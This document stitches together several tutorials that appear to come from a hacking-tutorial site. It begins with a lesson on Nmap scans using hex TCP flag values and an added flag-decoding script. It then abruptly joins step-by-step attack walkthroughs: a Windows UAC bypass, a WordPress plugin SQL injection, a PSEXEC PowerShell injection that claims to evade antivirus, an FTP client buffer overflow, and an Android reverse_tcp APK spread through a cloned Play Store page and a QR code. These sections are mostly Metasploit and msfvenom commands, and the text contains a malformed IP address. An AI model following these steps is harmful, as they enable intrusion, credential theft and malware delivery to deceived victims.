Nmap Scans using Hex Value of Flags

In this article we scan the target machine by sending TCP flags specified through their hexadecimal values, and confirm the actual flag name by analysing the Nmap traffic in Wireshark.

Let's have a look at the hex values of the TCP flags in the table given below, which we are going to use in Nmap for port enumeration.

NULL Scan

In this scan we send a TCP packet with no flags set (NONE), specified by its hexadecimal value, to the target machine to enumerate whether the port is open, closed or filtered.

Now execute the command given below to enumerate the state of a port; here we want to identify the state of port 21.

nmap -p21 --scanflags 0x00 192.168.1.103

From the image given below you can observe that port 21 is reported as filtered.

When the network admin captures the incoming traffic, he will see a packet with no TCP flags set (TCP-NONE). Here we have used Wireshark for network packet analysis, and it shows a TCP-NONE packet for hex value 0x00 coming from 192.168.1.104 to port 21, as shown in the image given below.

FIN Scan

The TCP FIN flag is used to finish a connection with the target. In this scan we send the FIN flag, specified by its hexadecimal value, to the target machine to enumerate whether the port is open, closed or filtered.

Now execute the command given below to enumerate the state of a port; here we want to identify the state of port 21.

nmap -p21 --scanflags 0x01 192.168.1.103

From the image given below you can observe that port 21 is reported as filtered.

When the network admin captures the incoming traffic, he will see a packet with the TCP FIN flag set. Here we have used Wireshark for network packet analysis, and it shows a TCP-FIN packet for hex value 0x01 coming from 192.168.1.104 to port 21, as shown in the image given below.

SYN Scan

The TCP SYN flag initiates communication to establish a connection with the target. In this scan we send the SYN flag, specified by its hexadecimal value, to the target machine to enumerate whether the port is open, closed or filtered.

Now execute the command given below to enumerate the state of a port; here we want to identify the state of port 21.

nmap -p21 --scanflags 0x02 192.168.1.103

From the image given below you can observe that port 21 is reported as open.

When the network admin captures the incoming traffic, he will see a packet with the TCP SYN flag set. Here we have used Wireshark for network packet analysis, and it shows a TCP-SYN packet for hex value 0x02 coming from 192.168.1.104 to port 21, as shown in the image given below.

Reset Scan

The RST flag is used to reset the connection between the sender machine and the target machine. In this scan we send the RST flag, specified by its hexadecimal value, to the target machine to enumerate whether the port is open, closed or filtered.

Now execute the command given below to enumerate the state of a port; here we want to identify the state of port 21.

nmap -p21 --scanflags 0x04 192.168.1.103

From the image given below you can observe that port 21 is reported as filtered.

When the network admin captures the incoming traffic, he will see a packet with the TCP RST flag set. Here we have used Wireshark for network packet analysis, and it shows a TCP-RST packet for hex value 0x04 coming from 192.168.1.104 to port 21, as shown in the image given below.

PUSH Scan

In this scan we send the PSH flag, specified by its hexadecimal value, to the target machine to enumerate whether the port is open, closed or filtered.

Now execute the command given below to enumerate the state of a port; here we want to identify the state of port 21.

nmap -p21 --scanflags 0x08 192.168.1.103

From the image given below you can observe that port 21 is reported as filtered.

When the network admin captures the incoming traffic, he will see a packet with the TCP PSH flag set. Here we have used Wireshark for network packet analysis, and it shows a TCP-PSH packet for hex value 0x08 coming from 192.168.1.104 to port 21, as shown in the image given below.

The PUSH flag is used to ask the target machine to process the packet's data with higher priority.

ACK Scan

The ACK flag is used to acknowledge to the sender whether a packet was received or dropped by the target, so that the sender can retransmit lost or dropped packets and complete the communication. Here we send the ACK flag, specified by its hexadecimal value, to the target machine to enumerate whether the port is open, closed or filtered.

Now execute the command given below to enumerate the state of a port; here we want to identify the state of port 21.

nmap -p21 --scanflags 0x10 192.168.1.103

From the image given below you can observe that port 21 is reported as closed.

When the network admin captures the incoming traffic, he will see a packet with the TCP ACK flag set. Here we have used Wireshark for network packet analysis, and it shows a TCP-ACK packet for hex value 0x10 coming from 192.168.1.104 to port 21, as shown in the image given below.

Open and closed ports will both return a RST packet. Nmap then labels them as unfiltered, meaning that they are reachable by the ACK packet, but whether they are open or closed is undetermined. Ports that don't respond, or send certain ICMP error messages back (type 3, code 0, 1, 2, 3, 9, 10, or 13), are labeled filtered. (From Nmap.org)

Urgent Scan

The URG flag is used to mark the packet as high priority for the target, so that the target machine stops processing the current packet and processes the URG-flagged packet instead. In this scan we send the URG flag, specified by its hexadecimal value, to the target machine to enumerate whether the port is open, closed or filtered.

Now execute the command given below to enumerate the state of a port; here we want to identify the state of port 21.

nmap -p21 --scanflags 0x20 192.168.1.103

From the image given below you can observe that port 21 is reported as filtered.

When the network admin captures the incoming traffic, he will see a packet with the TCP URG flag set. Here we have used Wireshark for network packet analysis, and it shows a TCP-URG packet for hex value 0x20 coming from 192.168.1.104 to port 21, as shown in the image given below.

XMAS Scan

In this scan we send a combination of flags to the target machine, specified by the sum of their hexadecimal values. As we know, an Xmas scan uses the combination of three TCP flags [FIN, PSH, URG] to enumerate the state of a port.

Adding the hex values of these flags (0x01 + 0x08 + 0x20) gives 0x29, the value we pass to Nmap, as described in the table given below.

Now execute the command given below to enumerate the state of a port; here we want to identify the state of port 21.

nmap -p21 --scanflags 0x29 192.168.1.103

From the image given below you can observe that port 21 is reported as filtered.

When the network admin captures the incoming traffic, he will see a packet with the TCP flags [FIN, PSH, URG] set. Here we have used Wireshark for network packet analysis, and it shows a TCP packet with FIN, PSH, URG for hex value 0x29 coming from 192.168.1.104 to port 21, as shown in the image given below.

Manual Combination of Flags [FIN, SYN, PSH]

Let's have a quick review of decimal-to-hexadecimal conversion with the help of the following table:

Now repeat the same methodology with a different combination of flags to enumerate the state of a port. For example, to scan a port by sending the combination of three flags [FIN, SYN and PSH], we identify the hex value of the sum of the three flags: 0x01 + 0x02 + 0x08 = 0x0B.

Now execute the command given below to enumerate the state of a port; here we want to identify the state of port 21.

nmap -p21 --scanflags 0x0B 192.168.1.103

From the image given below you can observe that port 21 is reported as filtered.

When the network admin captures the incoming traffic, he will see a packet with the TCP flags [FIN, SYN and PSH] set. Here we have used Wireshark for network packet analysis, and it shows a TCP packet with FIN, SYN, PSH for hex value 0x0B coming from 192.168.1.104 to port 21, as shown in the image given below.

Manual Combination of Flags [FIN, RST, PSH]

Now repeat the same methodology with a different combination of flags to enumerate the state of a port. For example, to scan a port by sending the combination of three flags [FIN, RST and PSH], we identify the hex value of the sum of the three flags: 0x01 + 0x04 + 0x08 = 0x0D.

Now execute the command given below to enumerate the state of a port; here we want to identify the state of port 21.

nmap -p21 --scanflags 0x0D 192.168.1.103

From the image given below you can observe that port 21 is reported as filtered.

When the network admin captures the incoming traffic, he will see a packet with the TCP flags [FIN, RST and PSH] set. Here we have used Wireshark for network packet analysis, and it shows a TCP packet with FIN, RST, PSH for hex value 0x0D coming from 192.168.1.104 to port 21, as shown in the image given below.

Manual Combination of Flags [FIN, SYN, RST, PSH]

Now repeat the same methodology with a different combination of flags to enumerate the state of a port. For example, to scan a port by sending the combination of four flags [FIN, SYN, RST and PSH], we identify the hex value of the sum of the four flags: 0x01 + 0x02 + 0x04 + 0x08 = 0x0F.

Now execute the command given below to enumerate the state of a port; here we want to identify the state of port 21.

nmap -p21 --scanflags 0x0F 192.168.1.103

From the image given below you can observe that port 21 is reported as filtered.

When the network admin captures the incoming traffic, he will see a packet with the TCP flags [FIN, SYN, RST and PSH] set. Here we have used Wireshark for network packet analysis, and it shows a TCP packet with FIN, SYN, RST, PSH for hex value 0x0F coming from 192.168.1.104 to port 21, as shown in the image given below.
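As an added example (not part of the original article), the following Python helper does the two things the sections above do by hand: it composes the --scanflags value from flag names by summing the bit values from the table, and it decodes a captured flags byte back into names the way Wireshark displays it. It also labels the combinations a network admin reviewing the capture would want to alert on. The packet tuples are constructed sample data modelled on the captures described above.

```python
# Added example: compose --scanflags hex values from TCP flag names, decode a
# captured flags byte back into names, and classify scan-like combinations.
TCP_FLAGS = {          # bit values from the article's table
    "FIN": 0x01, "SYN": 0x02, "RST": 0x04, "PSH": 0x08,
    "ACK": 0x10, "URG": 0x20,
}

def flags_to_hex(*names):
    """OR together the bit values of the given flags, e.g. FIN+PSH+URG -> 0x29."""
    value = 0
    for name in names:
        value |= TCP_FLAGS[name.upper()]
    return value

def hex_to_flags(value):
    """Decode a flags byte into the names of the set flags, lowest bit first."""
    return [name for name, bit in TCP_FLAGS.items() if value & bit]

def classify(value):
    """Label an unsolicited inbound TCP segment by its flag byte.
    Only SYN (connection opener) and ACK-bearing segments are normal traffic;
    every other combination is a probe signature worth an alert."""
    flags = set(hex_to_flags(value))
    if not flags:
        return "NULL scan (no flags)"
    if flags == {"FIN", "PSH", "URG"}:
        return "XMAS scan"
    if flags == {"SYN"}:
        return "SYN (normal connection attempt or SYN scan)"
    if "ACK" in flags:
        return "ACK set (ACK scan or established traffic)"
    if "SYN" in flags and ("FIN" in flags or "RST" in flags):
        return "invalid flag combination (SYN with FIN/RST)"
    return "non-standard probe: " + "+".join(sorted(flags))

# Constructed sample: (src, dst, dport, flags byte), as a Wireshark filter such
# as "tcp.flags == 0x29" would surface them from a capture.
SAMPLE_PACKETS = [
    ("192.168.1.104", "192.168.1.103", 21, 0x00),
    ("192.168.1.104", "192.168.1.103", 21, 0x29),
    ("192.168.1.104", "192.168.1.103", 21, 0x0B),
    ("192.168.1.104", "192.168.1.103", 21, 0x02),
]

def report(packets):
    """One line per packet: flags byte, decoded flag names, classification."""
    return [f"{s} -> {d}:{p} 0x{f:02X} {'|'.join(hex_to_flags(f)) or 'NONE'}: "
            f"{classify(f)}" for s, d, p, f in packets]

if __name__ == "__main__":
    print("\n".join(report(SAMPLE_PACKETS)))
```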

Hack Admin Access of Remote windows 10 PC using Eventvwr Registry Key Exploit

First of all, to learn how to hack the victim's PC, click here. Once you have gained a Meterpreter session, type:

getprivs

This command confirms that you do not have administrator privileges yet, so there is no need to worry.

Now use the following exploit

This module will bypass Windows UAC by hijacking a special key in the Registry under the current user hive, and inserting a custom command that will get invoked when the Windows Event Viewer is launched. It will spawn a second shell that has the UAC flag turned off. This module modifies a registry key, but cleans up the key once the payload has been invoked. The module does not require the architecture of the payload to match the OS. If specifying EXE::Custom your DLL should call ExitProcess() after starting your payload in a separate process.

Once the command executes our file, we get a session with administrator privileges, as shown.

WordPress Penetration Testing using Symposium Plugin SQL Injection

WP Symposium turns a WordPress website into a Social Network! It is a WordPress plugin that provides a forum, activity (similar to Facebook wall), member directory, private mail, notification panel, chat windows, profile page, social widgets, activity alerts, RSS activity feeds, Groups, Events, Gallery, Facebook Connect and Mobile support! You simply choose which you want to activate! Certain features are optional to members to protect their privacy.

WordPress plugin wp-symposium version 15.5.1 (and probably all existing previous versions) suffers from an unauthenticated SQL Injection in get_album_item.php parameter ‘size’. The issue is exploitable even if the plugin is deactivated.

The SQL injection allows (very easily) to retrieve all the database content, which includes users details and password hashes. An attacker may be able to crack users’ password hashes and log in as them. If an administrator user password is obtained, then the attacker could take complete control of the WordPress installation. Collected information may also allow further attacks.

https://www.exploit-db.com/exploits/37824

Attacker: Kali Linux

Target: WordPress

Let's start!!!!

Start WPScan in Kali with the following steps:

Now scan the target IP for a WordPress application by typing the following command.

This command enumerates the plugins currently installed on the WordPress website.

./wpscan.rb --url http://192.1681.0.104 --enumerate p

The red marker indicates that WP Symposium 15.5.1 is vulnerable and suffers from an unauthenticated SQL injection, while the blue marker shows that version 15.8 is the fixed release, which is not vulnerable so far.

Now start Metasploit by typing msfconsole in a terminal in Kali Linux.

msf > use auxiliary/admin/http/wp_symposium_sql_injection

msf auxiliary(wp_symposium_sql_injection) > set rhost 192.1681.0.104

msf auxiliary(wp_symposium_sql_injection) > set rport 80

msf auxiliary(wp_symposium_sql_injection) > exploit

Nice!!! Here we found the relevant username and password for the user raj.

Hack Remote PC using PSEXEC Injection in SET Toolkit

Attacker machine: Kali Linux

In this article I am going to perform a PowerShell injection attack through SEToolkit. For this attack the SMB service must be running, and you need to know the username and password of the target PC to get a Meterpreter session.

Let’s Begin The Game!!!

Scan the victim IP with Nmap by typing the following command in a terminal in Kali Linux:

nmap -sV 192.168.1.104

The version scan shows that port 445 is open. If you are not familiar with port/protocol mappings, port 445 is used by the SMB protocol for communication between different operating systems, as here between Linux and Windows.

Now Click Applications > Exploitation Tools > Social Engineering Toolkit > setoolkit.

A new terminal opens for the SEToolkit framework; now follow these steps to run the attack against the target.

From the screenshot you can see that it presents a menu for selecting the attack approach.

Choose Penetration Testing (Fast-Track) by typing 2.

Fast-Track is an automated penetration suite for penetration testers. The next screenshot shows the following options; choose PSEXEC Powershell Injection by typing 6.

PSEXEC Powershell Injection Attack: This attack will inject a meterpreter backdoor through powershell memory injection. This will avoid Anti-Virus since we will never touch disk or memory. Will require Powershell to be installed on the remote victim machine. You can use either straight passwords or hash values.

Now supply the following information to run the attack against the victim PC.

Enter remote IP as rhost: 192.168.1.104

Enter username: administrator

Enter password: Ignite@1234

If you don't know the domain name, just hit Enter; do the same for the random selection and for the number of threads.

Enter listener IP as lhost: 192.168.1.3

Enter port number: 445

This generates a payload for PowerShell injection and starts loading the Metasploit framework itself. From the image below you can see that, through alphanumeric shellcode, we have got Meterpreter session 1 open.

Now type sessions to view the active sessions.

Then type sessions -i 1 to enter the Meterpreter session.

meterpreter > sysinfo

{NOTE: This attack depends on the version of the SMB protocol; if the SMB version has been updated beyond 2.1, the attack may not succeed. Use an aggressive scan to get version details.}

Exploit Windows 10 pc using WinaXe 7.7 FTP Client Remote Buffer Overflow

This module exploits a buffer overflow in the WinaXe 7.7 FTP client. This issue is triggered when a client connects to the server and is expecting the Server Ready response.

Exploit Targets

WinaXe 7.7 FTP client

Requirements

Attacker: Kali Linux

Victim PC: Windows 7

Open a Kali terminal and type msfconsole

Now type use exploit/windows/ftp/winaxe_server_ready

msf exploit(winaxe_server_ready) > set lhost 192.168.0.106

msf exploit(winaxe_server_ready) > set srvhost 192.168.0.106

msf exploit(winaxe_server_ready) > set payload windows/meterpreter/reverse_tcp

msf exploit(winaxe_server_ready) > exploit

Now send the link to the victim. When the victim enters the connection details in the WinaXe FTP client and waits for the FTP connection, you will get a Meterpreter session.


Hack Android Phone using HTA Attack with QR Code

A QR code is a two-dimensional barcode which can be scanned using smartphones or dedicated QR readers. QR codes can link directly to contact numbers, websites, usernames, photos, SMS, e-mails and even encrypted data, but they do not end there. QR codes are a big deal in Japan, and it is just a matter of time before they take over the whole world as SEO grows.

By now every one of you must have understood that QR codes are the 'next big thing'; let's make them a big thing with regard to hacking. Yes! In this article we are going to hack our victim's mobile in a few easy steps using a QR code, and all you need for this is your beloved Kali Linux.

Our first step is to create a malicious file using msfvenom.

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.100 lport=6666 > /root/Desktop/Launcher.apk

Now open SET. Through SET we will turn the HTA attack into an APK attack to gain access to the victim's smartphone. From the SET menu select the 2nd option, Website Attack Vectors.

Then further select 8th option which refers to HTA Attack Method.

And then select Site Cloner by typing 2.

When you type 2, it will ask you to enter the URL that you want to clone. Here give the URL of the Play Store: https://play.google.com/store

Then, when it asks you to select the Meterpreter option, type 3 as we want reverse_tcp.

Furthermore, save the launcher.apk file that you created using msfvenom to /var/www/html/

Also rename the launcher.hta that SET has just created to launcher.apk, as shown below.

Now add the QR Code Extension to your Chrome browser.

The QR Code Extension will generate a QR code for you according to your attack.

Now start multi/handler so that your session is caught in time; for this type:

use multi/handler

set payload android/meterpreter/reverse_tcp

set lhost 192.168.1.100

set lport 6666

run

Now you can have the victim scan your code and install the app.

And voila!! As soon as the code has been scanned, you will have your Meterpreter session.